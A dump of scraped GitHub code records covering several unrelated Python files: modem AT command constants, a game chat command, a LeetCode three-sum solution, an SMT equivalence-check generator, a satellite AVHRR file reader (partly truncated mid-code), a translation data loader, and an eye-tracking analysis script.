+{"seq_id":"74313976694","text":"AT_OK = 'OK\\r'\nAT_AT = 'AT\\r'\n\nAT_ECHO_OFF = 'ATE0\\r'\n\nAT_CMD_MODE = '+++'\n\nAT_DISABLE_INDICATIONS = 'AT+CNMI=0,0,0,0\\r'\n\nAT_SIEMENS_SMS_STORAGE = 'AT+CPMS=MT\\r'\n\nAT_ERICSSON_SMS_STORAGE = 'AT+CPMS=\"ME\",\"SM\"\\r'\nAT_ERICSSON_T630_DISABLE_INDICATIONS = 'AT+CNMI=2,0,0,0\\r'\nAT_ERICSSON_DISABLE_INDICATIONS = 'AT+CNMI=3,0,0,0\\r'\n\nAT_MANUFACTURER = 'AT+CGMI\\r'\nAT_MODEL = 'AT+CGMM\\r'\nAT_SERIALNO = 'AT+CGSN\\r'\nAT_IMSI = 'AT+CIMI\\r'\nAT_BATTERY = 'AT+CBC\\r'\nAT_SIGNAL = 'AT+CSQ\\r'\nAT_SOFTWARE = 'AT+CGMR\\r'\n\nAT_LIST = 'AT+CMGL=%s\\r'\n#AT_LIST = 'AT+CMGL=\"%s\"\\r'\n\nAT_SEND_MESSAGE = 'AT+CMGS=%s\\r'\n#AT_SEND_MESSAGE = 'AT+CMGS=\"%s\"\\r'\nAT_KEEP_LINK_OPEN = 'AT+CMMS=1\\r'\n\nAT_DELETE_MESSAGE = 'AT+CMGD=%s\\r'\n\nAT_ASCII_MODE = 'AT+CMGF=1\\r'\nAT_PDU_MODE = 'AT+CMGF=0\\r'\nAT_SET_CHARSET = 'AT+CSCS=%s\\r'\n\nAT_CHECK_LOGIN = 'AT+CPIN?\\r'\nAT_LOGIN = 'AT+CPIN=\"%s\"\\r'\nAT_READY = 'READY\\r'\n\n","repo_name":"bugnano/pysmsengine","sub_path":"pySmsEngine/at_commands.py","file_name":"at_commands.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"26649881420","text":"from . 
import Game, decorate_command, Command, OneValueToken, none\nimport json\nimport threading\nfrom .....roots import USER_ROOT\nuser_path = USER_ROOT / \"user.json\"\n\n@decorate_command(nb_params=1)\ndef set_username(new_name, *, game: Game):\n if new_name is none:\n new_name = None\n if isinstance(new_name, OneValueToken):\n new_name = new_name.base_value\n new_name: str\n with user_path.open(\"r\") as f:\n user_data = json.load(f)\n user_data[\"username\"] = new_name\n with user_path.open(\"w\") as f:\n json.dump(user_data, f)\n threading.Thread(target=game.player.set_img).start()\n\n\nuser = Command(\"user\", subcommands={\"name\": set_username})\nusername = Command(\"username\", function=set_username)\n","repo_name":"AlphaNow37/PyCraft","sub_path":"code_src/chat/command/commands/shell/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"}
+{"seq_id":"72867785972","text":"# Given an integer array nums, return all the triplets [nums[i], nums[j], nums[k]] such that i != j, i != k, and j != k, and nums[i] + nums[j] + nums[k] == 0.\n\n# Notice that the solution set must not contain duplicate triplets.\n\n\n# Example 1:\n\n# Input: nums = [-1,0,1,2,-1,-4]\n# Output: [[-1,-1,2],[-1,0,1]]\n# Explanation: \n# nums[0] + nums[1] + nums[2] = (-1) + 0 + 1 = 0.\n# nums[1] + nums[2] + nums[4] = 0 + 1 + (-1) = 0.\n# nums[0] + nums[3] + nums[4] = (-1) + 2 + (-1) = 0.\n# The distinct triplets are [-1,0,1] and [-1,-1,2].\n# Notice that the order of the output and the order of the triplets does not matter.\n# Example 2:\n\n# Input: nums = [0,1,1]\n# Output: []\n# Explanation: The only possible triplet does not sum up to 0.\n# Example 3:\n\n# Input: nums = [0,0,0]\n# Output: [[0,0,0]]\n# Explanation: The only possible triplet sums up to 0.\n\n\nclass Solution:\n def threeSum(self, nums: List[int]) -> List[List[int]]:\n res = [] # Initialize an empty list to store the result (lists of unique triplets).\n nums.sort() # Sort the list so duplicate values are adjacent and the two-pointer scan below works.\n\n for i, a in enumerate(nums): # Loop through the sorted list using its index and value.\n if i > 0 and a == nums[i-1]: # Check if the current value is the same as the previous one.\n continue # If it is, skip to the next iteration to avoid duplicates.\n\n l, r = i + 1, len(nums) - 1 # Initialize left and right pointers for two-sum check.\n while l < r: # While the left pointer is less than the right pointer.\n threeSum = a + nums[l] + nums[r] # Calculate the sum of the three values.\n\n if threeSum > 0:\n r -= 1 # If the sum is positive, decrement the right pointer.\n elif threeSum < 0:\n l += 1 # If the sum is negative, increment the left pointer.\n else:\n res.append([a, nums[l], nums[r]]) # If the sum is zero, add the triplet to the result list.\n l += 1 # Move the left pointer to the right.\n while nums[l] == nums[l-1] and l < r:\n l += 1 # Skip duplicate values to avoid duplicate triplets.\n\n return res # Return the list of unique triplets that sum to zero.\n\n\n ","repo_name":"XEthanLynchX/Leetcode","sub_path":"Two_pointers/ThreeSum.py","file_name":"ThreeSum.py","file_ext":"py","file_size_in_byte":2335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22793699342","text":"import sys\nimport argparse\n\nclass Config(object):\n input_file1 = None\n input_file2 = None\n\n inputs_list1 = None\n inputs_list2 = None\n outputs_list1 = None\n outputs_list2 
= None\n\n def __init__(self):\n self.input_file1 = None\n self.input_file2 = None\n self.inputs_list1 = None\n self.inputs_list2 = None\n self.outputs_list1 = None\n self.outputs_list2 = None\n\ndef generate_equivalence_check(config):\n\n model_1 = \"\"\n with open(config.input_file1) as f:\n model_1 = f.read()\n\n model_2 = \"\"\n with open(config.input_file2) as f:\n model_2 = f.read()\n\n inps1 = []\n inps2 = []\n\n if config.inputs_list1 != \"\":\n inps1 = config.inputs_list1.replace(\" \", \"\").split(\",\")\n\n if config.inputs_list2 != \"\":\n inps2 = config.inputs_list2.replace(\" \", \"\").split(\",\")\n\n assert(len(inps1) == len(inps2))\n\n inps = [(x1, inps2[inps1.index(x1)]) for x1 in inps1]\n\n outs1 = []\n outs2 = []\n\n if config.outputs_list1 != \"\":\n outs1 = config.outputs_list1.replace(\" \", \"\").split(\",\")\n\n if config.outputs_list2 != \"\":\n outs2 = config.outputs_list2.replace(\" \", \"\").split(\",\")\n\n assert(len(outs1) == len(outs2))\n\n outs = [(x1, outs2[outs1.index(x1)]) for x1 in outs1]\n \n\n set_vals = []\n\n init_vars_1 = []\n curr_vars_1 = []\n next_vars_1 = []\n init_1 = []\n trans_1 = []\n variables_1 = []\n\n init_vars_2 = []\n curr_vars_2 = []\n next_vars_2 = []\n init_2 = []\n trans_2 = []\n variables_2 = []\n\n (set_vals, variables_1, init_vars_1, curr_vars_1, next_vars_1, init_1, trans_1) = parse_model(model_1)\n (set_vals, variables_2, init_vars_2, curr_vars_2, next_vars_2, init_2, trans_2) = parse_model(model_2)\n\n print(\"\\n\".join(set_vals))\n\n print(\"\\n\".join([x.replace(CURR, m_1(\"\")+CURR) for x in curr_vars_1]))\n print(\"\\n\".join([x.replace(NEXT, m_1(\"\")+NEXT) for x in next_vars_1]))\n print(\"\\n\".join([x.replace(CURR, m_1(\"\")+CURR).replace(NEXT, m_1(\"\")+NEXT) for x in trans_1]))\n\n print(\"\\n\".join([x.replace(CURR, m_2(\"\")+CURR) for x in curr_vars_2]))\n print(\"\\n\".join([x.replace(NEXT, m_2(\"\")+NEXT) for x in next_vars_2]))\n print(\"\\n\".join([x.replace(CURR, m_2(\"\")+CURR).replace(NEXT, m_2(\"\")+NEXT) for x in trans_2]))\n\n pre = []\n\n for inp in inps:\n pre.append(\"(= %s %s)\"%(curr(m_1(inp[0])), curr(m_2(inp[1]))))\n\n for ous in outs:\n pre.append(\"(= %s %s)\"%(curr(m_1(ous[0])), curr(m_2(ous[1]))))\n\n for inp in inps:\n pre.append(\"(= %s %s)\"%(next(m_1(inp[0])), next(m_2(inp[1]))))\n \n pos = []\n\n for ous in outs:\n pos.append(\"(= %s %s)\"%(next(m_1(ous[0])), next(m_2(ous[1]))))\n\n\n precond = to_and(pre)\n poscond = to_and(pos)\n cond = \"(and %s (not %s))\"%(precond, poscond)\n\n print(\"(assert %s)\"%cond)\n\n print(\"(check-sat)\")\n\n return 0\n\n\nDFUN = \"declare-fun\"\nCURR = \"__CURR__\"\nNEXT = \"__NEXT__\"\nINIT = \"__AT0\"\nCOMM = \";;\"\n\ndef parse_model(model):\n setvals = []\n init_vars = []\n curr_vars = []\n next_vars = []\n init = []\n trans = []\n variables = []\n\n for line in model.split(\"\\n\"):\n if COMM in line:\n continue\n if line == \"\":\n continue\n if (\"declare-fun\" in line):\n if (CURR in line):\n curr_vars.append(line)\n var = line[line.find(DFUN)+len(DFUN)+1:line.find(\")\")-2]\n variables.append(var)\n if (NEXT in line):\n next_vars.append(line)\n if (INIT in line):\n init_vars.append(line)\n elif (\"set\" in line):\n setvals.append(line)\n else:\n if INIT in line:\n init.append(line)\n else:\n trans.append(line)\n\n return (setvals, variables, init_vars, curr_vars, next_vars, init, trans)\n\ndef to_and(lst):\n if len(lst) == 1:\n return lst[0]\n \n ret = \"(and %s %s)\"%(lst[0], lst[1])\n if len(lst) == 2:\n return ret\n\n for i in 
range(2,len(lst),1):\n ret = \"(and %s %s)\"%(ret, lst[i])\n\n return ret\n\ndef at(time):\n return \"__AT%s\"%time\n\ndef curr(var):\n return \"%s%s\"%(var, CURR)\n\ndef next(var):\n return \"%s%s\"%(var, NEXT)\n\ndef m_1(prefix):\n return \"%s<1>\"%prefix\n\ndef m_2(prefix):\n return \"%s<2>\"%prefix\n\n\nif __name__ == \"__main__\":\n\n    parser = argparse.ArgumentParser(description='Equivalence check of two smtlib2 formulas generated by CoreIR.')\n\n    parser.set_defaults(input_file1=None)\n    parser.add_argument('-if1', '--input-file1', metavar='input_file1', type=str, required=True,\n help='input file 1')\n\n    parser.set_defaults(input_file2=None)\n    parser.add_argument('-if2', '--input-file2', metavar='input_file2', type=str, required=True,\n help='input file 2')\n    \n    parser.set_defaults(inputs_1=None)\n    parser.add_argument('-i1', '--inputs-1', metavar='inputs_1', type=str, required=True,\n help='list of input variables for file 1')\n\n    parser.set_defaults(inputs_2=None)\n    parser.add_argument('-i2', '--inputs-2', metavar='inputs_2', type=str, required=True,\n help='list of input variables for file 2')\n\n    parser.set_defaults(outputs_1=None)\n    parser.add_argument('-o1', '--outputs-1', metavar='outputs_1', type=str, required=True,\n help='list of output variables for file 1')\n\n    parser.set_defaults(outputs_2=None)\n    parser.add_argument('-o2', '--outputs-2', metavar='outputs_2', type=str, required=True,\n help='list of output variables for file 2')\n    \n    args = parser.parse_args()\n\n    config = Config()\n    \n    config.input_file1 = args.input_file1\n    config.input_file2 = args.input_file2\n    config.inputs_list1 = args.inputs_1\n    config.inputs_list2 = args.inputs_2\n    config.outputs_list1 = args.outputs_1\n    config.outputs_list2 = args.outputs_2\n\n    sys.exit(generate_equivalence_check(config))\n","repo_name":"rdaly525/coreir","sub_path":"tools/formal_verification/equivalence_checking.py","file_name":"equivalence_checking.py","file_ext":"py","file_size_in_byte":6072,"program_lang":"python","lang":"en","doc_type":"code","stars":92,"dataset":"github-code","pt":"21"}
+{"seq_id":"29361003385","text":"import functools\nimport logging\nfrom datetime import datetime, timedelta\n\nimport dask.array as da\nimport numpy as np\nimport xarray as xr\nfrom dask import delayed\n\nfrom satpy import CHUNK_SIZE\nfrom satpy.readers.file_handlers import BaseFileHandler\n\nLINE_CHUNK = CHUNK_SIZE ** 2 // 2048\n\nlogger = logging.getLogger(__name__)\n\nCHANNEL_NAMES = ['1', '2', '3a', '3b', '4', '5']\n\nANGLES = ['sensor_zenith_angle',\n 'solar_zenith_angle',\n 'sun_sensor_azimuth_difference_angle']\n\nPLATFORM_NAMES = {4: 'NOAA-15',\n 2: 'NOAA-16',\n 6: 'NOAA-17',\n 7: 'NOAA-18',\n 8: 'NOAA-19',\n 11: 'Metop-B',\n 12: 'Metop-A',\n 13: 'Metop-C',\n 14: 'Metop simulator'}\n\n\ndef create_xarray(arr):\n \"\"\"Create an `xarray.DataArray`.\"\"\"\n res = xr.DataArray(arr, dims=['y', 'x'])\n return res\n\n\nclass AVHRRAAPPL1BFile(BaseFileHandler):\n \"\"\"Reader for AVHRR L1B files created from the AAPP software.\"\"\"\n\n def __init__(self, filename, filename_info, filetype_info):\n \"\"\"Initialize object information by reading the input file.\"\"\"\n super(AVHRRAAPPL1BFile, self).__init__(filename, filename_info,\n filetype_info)\n self.channels = {i: None for i in AVHRR_CHANNEL_NAMES}\n self.units = {i: 'counts' for i in AVHRR_CHANNEL_NAMES}\n\n self._data = None\n self._header = None\n self._is3b = None\n self._is3a = None\n self._shape = None\n self.area = None\n self.sensor = 'avhrr-3'\n self.read()\n\n 
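# read() memory-maps the AAPP L1B header and scanline records; the activation\n # flags decoded next come from the header's instrument status words.\n 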
self.active_channels = self._get_active_channels()\n\n self.platform_name = PLATFORM_NAMES.get(self._header['satid'][0], None)\n\n if self.platform_name is None:\n raise ValueError(\"Unsupported platform ID: %d\" % self.header['satid'])\n\n def _get_active_channels(self):\n status = self._get_channel_binary_status_from_header()\n return self._convert_binary_channel_status_to_activation_dict(status)\n\n def _get_channel_binary_status_from_header(self):\n status = self._header['inststat1'].item()\n change_line = self._header['statchrecnb']\n if change_line > 0:\n status |= self._header['inststat2'].item()\n return status\n\n @staticmethod\n def _convert_binary_channel_status_to_activation_dict(status):\n bits_channels = ((13, '1'),\n (12, '2'),\n (11, '3a'),\n (10, '3b'),\n (9, '4'),\n (8, '5'))\n activated = dict()\n for bit, channel_name in bits_channels:\n activated[channel_name] = bool(status >> bit & 1)\n return activated\n\n @property\n def start_time(self):\n \"\"\"Get the time of the first observation.\"\"\"\n return datetime(self._data['scnlinyr'][0], 1, 1) + timedelta(\n days=int(self._data['scnlindy'][0]) - 1,\n milliseconds=int(self._data['scnlintime'][0]))\n\n @property\n def end_time(self):\n \"\"\"Get the time of the final observation.\"\"\"\n return datetime(self._data['scnlinyr'][-1], 1, 1) + timedelta(\n days=int(self._data['scnlindy'][-1]) - 1,\n milliseconds=int(self._data['scnlintime'][-1]))\n\n def get_dataset(self, key, info):\n \"\"\"Get a dataset from the file.\"\"\"\n if key['name'] in CHANNEL_NAMES:\n if self.active_channels[key['name']]:\n dataset = self.calibrate(key)\n else:\n return None\n elif key['name'] in ['longitude', 'latitude']:\n dataset = self.navigate(key['name'])\n dataset.attrs = info\n elif key['name'] in ANGLES:\n dataset = self.get_angles(key['name'])\n else:\n raise ValueError(\"Not a supported dataset: %s\", key['name'])\n\n self._update_dataset_attributes(dataset, key, info)\n\n if not self._shape:\n self._shape = dataset.shape\n\n return dataset\n\n def _update_dataset_attributes(self, dataset, key, info):\n dataset.attrs.update({'platform_name': self.platform_name,\n 'sensor': self.sensor})\n dataset.attrs.update(key.to_dict())\n for meta_key in ('standard_name', 'units'):\n if meta_key in info:\n dataset.attrs.setdefault(meta_key, info[meta_key])\n\n def read(self):\n \"\"\"Read the data.\"\"\"\n tic = datetime.now()\n header = np.memmap(self.filename, dtype=_HEADERTYPE, mode=\"r\", shape=(1, ))\n data = np.memmap(self.filename, dtype=_SCANTYPE, offset=22016, mode=\"r\")\n\n logger.debug(\"Reading time %s\", str(datetime.now() - tic))\n\n self._header = header\n self._data = data\n\n def available_datasets(self, configured_datasets=None):\n \"\"\"Get the available datasets.\"\"\"\n for _, mda in configured_datasets:\n if mda['name'] in CHANNEL_NAMES:\n yield self.active_channels[mda['name']], mda\n else:\n yield True, mda\n\n def get_angles(self, angle_id):\n \"\"\"Get sun-satellite viewing angles.\"\"\"\n sunz, satz, azidiff = self._get_all_interpolated_angles()\n\n name_to_variable = dict(zip(ANGLES, (satz, sunz, azidiff)))\n return create_xarray(name_to_variable[angle_id])\n\n @functools.lru_cache(maxsize=10)\n def _get_all_interpolated_angles(self):\n sunz40km, satz40km, azidiff40km = self._get_tiepoint_angles_in_degrees()\n return self._interpolate_arrays(sunz40km, satz40km, azidiff40km)\n\n def _get_tiepoint_angles_in_degrees(self):\n sunz40km = self._data[\"ang\"][:, :, 0] * 1e-2\n satz40km = self._data[\"ang\"][:, :, 1] * 1e-2\n 
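# The raw \"ang\" tiepoint fields store angles in hundredths of a degree, so the\n # 1e-2 factor converts them to plain degrees on the 40 km tiepoint grid.\n 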
azidiff40km = self._data[\"ang\"][:, :, 2] * 1e-2\n return sunz40km, satz40km, azidiff40km\n\n def _interpolate_arrays(self, *input_arrays):\n lines = input_arrays[0].shape[0]\n try:\n interpolator = self._create_40km_interpolator(lines, *input_arrays)\n except ImportError:\n logger.warning(\"Could not interpolate, python-geotiepoints missing.\")\n output_arrays = input_arrays\n else:\n output_delayed = delayed(interpolator.interpolate, nout=3)()\n output_arrays = [da.from_delayed(out_array, (lines, 2048), in_array.dtype)\n for in_array, out_array in zip(input_arrays, output_delayed)]\n return output_arrays\n\n @staticmethod\n def _create_40km_interpolator(lines, *arrays_40km):\n from geotiepoints.interpolator import Interpolator\n cols40km = np.arange(24, 2048, 40)\n cols1km = np.arange(2048)\n rows40km = np.arange(lines)\n rows1km = np.arange(lines)\n along_track_order = 1\n cross_track_order = 3\n satint = Interpolator(\n arrays_40km, (rows40km, cols40km),\n (rows1km, cols1km), along_track_order, cross_track_order)\n return satint\n\n def navigate(self, coordinate_id):\n \"\"\"Get the longitudes and latitudes of the scene.\"\"\"\n lons, lats = self._get_all_interpolated_coordinates()\n if coordinate_id == 'longitude':\n return create_xarray(lons)\n elif coordinate_id == 'latitude':\n return create_xarray(lats)\n else:\n raise KeyError(\"Coordinate {} unknown.\".format(coordinate_id))\n\n @functools.lru_cache(maxsize=10)\n def _get_all_interpolated_coordinates(self):\n lons40km, lats40km = self._get_coordinates_in_degrees()\n return self._interpolate_arrays(lons40km, lats40km)\n\n def _get_coordinates_in_degrees(self):\n lons40km = self._data[\"pos\"][:, :, 1] * 1e-4\n lats40km = self._data[\"pos\"][:, :, 0] * 1e-4\n return lons40km, lats40km\n\n def calibrate(self,\n dataset_id,\n pre_launch_coeffs=False,\n calib_coeffs=None):\n \"\"\"Calibrate the data.\"\"\"\n if calib_coeffs is None:\n calib_coeffs = {}\n\n units = {'reflectance': '%',\n 'brightness_temperature': 'K',\n 'counts': '',\n 'radiance': 'W*m-2*sr-1*cm ?'}\n\n if dataset_id['name'] in (\"3a\", \"3b\") and self._is3b is None:\n # Is it 3a or 3b:\n self._is3a = da.bitwise_and(da.from_array(self._data['scnlinbit'],\n chunks=LINE_CHUNK), 3) == 0\n self._is3b = da.bitwise_and(da.from_array(self._data['scnlinbit'],\n chunks=LINE_CHUNK), 3) == 1\n\n try:\n vis_idx = ['1', '2', '3a'].index(dataset_id['name'])\n ir_idx = None\n except ValueError:\n vis_idx = None\n ir_idx = ['3b', '4', '5'].index(dataset_id['name'])\n\n mask = True\n if vis_idx is not None:\n coeffs = calib_coeffs.get('ch' + dataset_id['name'])\n if dataset_id['name'] == '3a':\n mask = self._is3a[:, None]\n ds = create_xarray(\n _vis_calibrate(self._data,\n vis_idx,\n dataset_id['calibration'],\n pre_launch_coeffs,\n coeffs,\n mask=mask))\n else:\n if dataset_id['name'] == '3b':\n mask = self._is3b[:, None]\n ds = create_xarray(\n _ir_calibrate(self._header,\n self._data,\n ir_idx,\n dataset_id['calibration'],\n mask=mask))\n\n ds.attrs['units'] = units[dataset_id['calibration']]\n ds.attrs.update(dataset_id._asdict())\n return ds\n\n\nAVHRR_CHANNEL_NAMES = (\"1\", \"2\", \"3a\", \"3b\", \"4\", \"5\")\n\n# AAPP 1b header\n\n_HEADERTYPE = np.dtype([(\"siteid\", \"S3\"),\n (\"blank\", \"S1\"),\n (\"l1bversnb\", \" 0.0\n return da.where(mask, rad, np.nan)\n\n # Central wavenumber:\n cwnum = header['radtempcnv'][0, irchn, 0]\n if irchn == 0:\n cwnum = cwnum / 1.0e2\n else:\n cwnum = cwnum / 1.0e3\n\n bandcor_2 = header['radtempcnv'][0, irchn, 1] / 1e5\n bandcor_3 = 
header['radtempcnv'][0, irchn, 2] / 1e6\n\n ir_const_1 = 1.1910659e-5\n ir_const_2 = 1.438833\n\n t_planck = (ir_const_2 * cwnum) / \\\n np.log(1 + ir_const_1 * cwnum * cwnum * cwnum / rad)\n\n # Band corrections applied to t_planck to get correct\n # brightness temperature for channel:\n if bandcor_2 < 0: # Post AAPP-v4\n tb_ = bandcor_2 + bandcor_3 * t_planck\n else: # AAPP 1 to 4\n tb_ = (t_planck - bandcor_2) / bandcor_3\n\n # Mask unnaturally low values\n\n return da.where(mask, tb_, np.nan)\n","repo_name":"Mervolt/pp","sub_path":"venv/Lib/site-packages/satpy/readers/aapp_l1b.py","file_name":"aapp_l1b.py","file_ext":"py","file_size_in_byte":22114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29629591904","text":"from .data_loader import DataLoader as DataLoaderBase\nfrom .data_loader import Data\nfrom typing import NamedTuple\n\nimport pandas as pd\nimport tensorflow as tf\nfrom sklearn.model_selection import train_test_split\nfrom ..preprocessor.base import PreprocessorBase\nfrom ..preprocessor.english import EngPreprocessor\nfrom ..preprocessor.german import GerPreprocessor\nfrom ..preprocessor.korean import KorPreprocessor\n\nOOV_TOKEN = \"\"\nlogger = tf.get_logger()\n\nkeras = tf.keras\n\n\nclass DataLoader(DataLoaderBase):\n def __init__(self, *args, **kwargs):\n # super(DataLoader, self).__init__(*args, **kwargs)\n\n num_words = kwargs.get(\"num_words\", None)\n maxlen = kwargs.get(\"maxlen\", None)\n deu = kwargs.get(\"deu\", None)\n n_data = kwargs.get(\"n_data\", None)\n validation_split = kwargs.get(\"validation_split\", None)\n\n self.maxlen = maxlen\n self.deu = deu\n self.num_words = num_words\n logger.info(\"Initializing Dataloader\")\n self.preprocessor = NamedTuple(\n \"Preprocessor\", [(\"ori\", PreprocessorBase), (\"tar\", PreprocessorBase)]\n )\n self.preprocessor.ori = EngPreprocessor()\n if deu:\n self.preprocessor.tar = GerPreprocessor()\n else:\n self.preprocessor.tar = KorPreprocessor()\n\n self.data_path = args[0]\n self.n_data = n_data\n self.test_size = validation_split\n self.data_train = None\n self.data_test = None\n self.ori_vocab_size = None\n self.tar_vocab_size = None\n\n self.tokenizer = keras.preprocessing.text.Tokenizer(\n num_words=num_words, filters=\"\", lower=True, split=\" \", oov_token=OOV_TOKEN\n )\n\n self.build()\n\n def _load_data(self):\n logger.info(f\"Loading data from {self.data_path}\")\n _data = []\n if self.deu:\n with open(self.data_path, \"r\", encoding=\"utf8\") as f:\n for line in f:\n line = line.split(\"\\t\")\n ori = self.preprocessor.ori.preprocess(line[0])\n tar = self.preprocessor.tar.preprocess(line[1])\n _data.append([ori, tar])\n if self.n_data:\n if self.n_data == len(_data):\n break\n else:\n data = pd.read_excel(self.data_path, sheet_name=\"Sheet1\")\n for idx, row in data.iterrows():\n en = row[\"en\"]\n ko = row[\"ko\"]\n\n en = self.preprocessor.ori.preprocess(en)\n ko = self.preprocessor.tar.preprocess(ko)\n\n _data.append([en, ko])\n\n if self.n_data:\n if self.n_data == len(_data):\n break\n\n _data_train, _data_test = train_test_split(\n _data, test_size=self.test_size, shuffle=False\n )\n ori_train, tar_train = zip(*_data_train)\n ori_test, tar_test = zip(*_data_test)\n\n # Main difference.\n self.tokenizer.fit_on_texts(ori_train + tar_train)\n\n ori_train = self._tokenize(ori_train, self.tokenizer, fit=False)\n tar_train = self._tokenize(tar_train, self.tokenizer, fit=False)\n\n ori_test = self._tokenize(ori_test, self.tokenizer, fit=False)\n 
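# With fit=False the tokenizer is not re-fitted here: the test texts reuse the\n # vocabulary learned from the training split, and unseen words map to OOV_TOKEN.\n 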
tar_test = self._tokenize(tar_test, self.tokenizer, fit=False)\n\n self.data_train = Data(ori=ori_train, tar=tar_train)\n self.data_test = Data(ori=ori_test, tar=tar_test)\n","repo_name":"minhyeoky/machine-translation","sub_path":"src/data/data_loader_transformer.py","file_name":"data_loader_transformer.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"74733377653","text":"from typing import Dict\n\nfrom pathlib import Path\n\nimport ncempy.io as nio\n\nfrom oremda.api import operator\nfrom oremda.typing import JSONType, PortKey, RawPort\n\n\n@operator\ndef ncem_reader(\n _inputs: Dict[PortKey, RawPort], parameters: JSONType\n) -> Dict[PortKey, RawPort]:\n filename = parameters.get(\"filename\", \"\")\n\n dPath = Path(\"/data\")\n fPath = Path(filename)\n\n spectrum = nio.read(dPath / fPath)\n data = spectrum[\"data\"]\n\n outputs = {\n \"image\": RawPort(data=data),\n }\n\n return outputs\n","repo_name":"OpenChemistry/oremda","sub_path":"operators/ncem_reader/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"28607163080","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 4 14:54:05 2019\n@author: sammirc\n\"\"\"\n\nimport numpy as np\nimport scipy as sp\nimport pandas as pd\nfrom copy import deepcopy\nimport os\nimport os.path as op\nimport sys\nfrom matplotlib import pyplot as plt\nimport pickle\n\n#sys.path.insert(0, '/Users/sammi/Desktop/Experiments/DPhil/wmConfidence_eegfmri/analysis_scripts')\nsys.path.insert(0, '/home/sammirc/Desktop/DPhil/wmConfidence_eegfmri/analysis_scripts')\nfrom wmConfidence_funcs import get_subject_info_wmConfidence\n\n#sys.path.insert(0, '/Users/sammi/Desktop/Experiments/BCEyes')\nsys.path.insert(0, '/home/sammirc/Desktop/DPhil/BCEyes')\nimport BCEyes as bce\n\n\nwd = '/Users/sammi/Desktop/Experiments/DPhil/wmConfidence_eegfmri'; #laptop wd\nwd = '/home/sammirc/Desktop/DPhil/wmConfidence_eegfmri' #workstation wd\nos.chdir(wd)\n\n\nsubs = np.array(['pilot1_inside', 'pilot2_inside', 'pilot1_outside'])\n\n\nsubind = 3 #get first subject\n\nsub = dict(loc='workstation',\n id=subs[subind-1]) #get subject name for param extraction\nparam = get_subject_info_wmConfidence(sub)\n\nif op.exists(param['cleanedeyes']):\n with open(param['cleanedeyes'], 'rb') as handle:\n data = pickle.load(handle)\nelse: \n data = bce.parse_eye_data(eye_fname = param['raweyes'], block_rec=True,trial_rec = False, nblocks=8) #load the data\n \n nblocks = len(data) #get number of blocks in data\n \n #this will just nan any points that aren't possible with the screen dimensions you have (something went wrong, or tracker fritzed)\n data = bce.replace_points_outside_screen(data = data, nblocks = nblocks,\n traces_to_scan = ['lx', 'ly', 'rx', 'ry'], screen_dim = [1920, 1080],\n adjust_pupils=False)\n \n #detect blinks in the data using pupil trace, not gaze coords. 
uses physiological limits for pupil movement to detect blinks\n data = bce.cleanblinks_usingpupil(data = data,\n nblocks = nblocks,\n signals_to_clean = ['x', 'y'],\n eyes = ['left', 'right'])\n \n #find all nan periods in the data (eg missing due to blinks) and add to data structure\n data = bce.find_missing_periods(data = data,\n nblocks = nblocks,\n traces_to_scan = ['lp', 'rp', 'lx', 'rx', 'ly', 'ry'])\n \n #now interpolate these missing periods to clean the data\n ds = deepcopy(data) #will use this to actually see how much better the data is after cleaning\n #data = deepcopy(ds) #if you make a mistake at some point, run this line\n \n blockid = 1\n clean_traces = ['lp', 'rp', 'lx', 'rx', 'ly', 'ry']\n for block in data:\n print('cleaning data for block %02d/%02d'%(blockid,nblocks))\n for trace in clean_traces:\n block = bce.interpolateBlinks_Blocked(block,trace)\n blockid +=1\n \n import pickle\n with open(param['cleanedeyes'], 'wb') as handle:\n pickle.dump(data, handle)\n \n\n#check quality of cleaning here\n\nblockid = 0\n\nplt.figure()\nplt.plot(data[blockid]['lp'], lw = 1, color = '#238b45', label = 'left pupil cleaned')\nplt.plot(ds[blockid]['lp'], lw = 1, color = '#d7301f', label = 'left pupil raw')\nplt.legend()\nplt.title('example of blink artefact removal in pupil trace')\n\n\n#before we can epoch, lets read in the behavioural data and add it to the data structure\nbdata = pd.DataFrame.from_csv(param['behaviour'])\n\n\n\n# epoch the cleaned data\nall_trigs = sorted(np.unique(data[0]['Msg'][:,2]))\n\ncue_trigs = dict(neutral_left='trig11', neutral_right='trig12', cued_left='trig13', cued_right='trig14', neutral=['trig11','trig12'], cued=['trig13','trig14'])\n\n\ncued_cueperiod = bce.epoch(data, trigger_values = cue_trigs['cued'], traces=['lx','rx'],twin=[-0.5,1.5],srate=1000)\ncued_cueperiod = bce.apply_baseline(cued_cueperiod, traces = ['lx', 'rx'], baseline_window=[-0.2,0.0], mode='mean', baseline_shift_gaze=[960,540])\ncued_cueperiod = bce.average_eyes(cued_cueperiod, traces=['x'])\n\nneutral_cueperiod = bce.epoch(data,trigger_values=cue_trigs['neutral'],traces=['lx','rx'],twin=[-0.5,1.5],srate=1000)\nneutral_cueperiod = bce.apply_baseline(neutral_cueperiod,traces=['lx','rx'],baseline_window=[-0.2,0.0], mode='mean', baseline_shift_gaze=[960,540])\nneutral_cueperiod = bce.average_eyes(neutral_cueperiod, traces = ['x'])\n\ntwin_srate = np.multiply([cued_cueperiod['info']['tmin'],cued_cueperiod['info']['tmax']],cued_cueperiod['info']['srate']).astype(int)\ntimerange = np.divide(np.arange(twin_srate[0],twin_srate[1],1,dtype=float),cued_cueperiod['info']['srate'])\n\n#plot just raw x coordinates, average across trials, evoked by valid retrocues\nplt.figure()\nplt.plot(timerange, np.subtract(np.nanmean(cued_cueperiod['ave_x'][cued_cueperiod['info']['trigger']==cue_trigs['cued_left'],],0),960),label='cued left', lw=1,color='#fc8d59')\nplt.plot(timerange, np.subtract(np.nanmean(cued_cueperiod['ave_x'][cued_cueperiod['info']['trigger']==cue_trigs['cued_right'],],0),960),label='cued 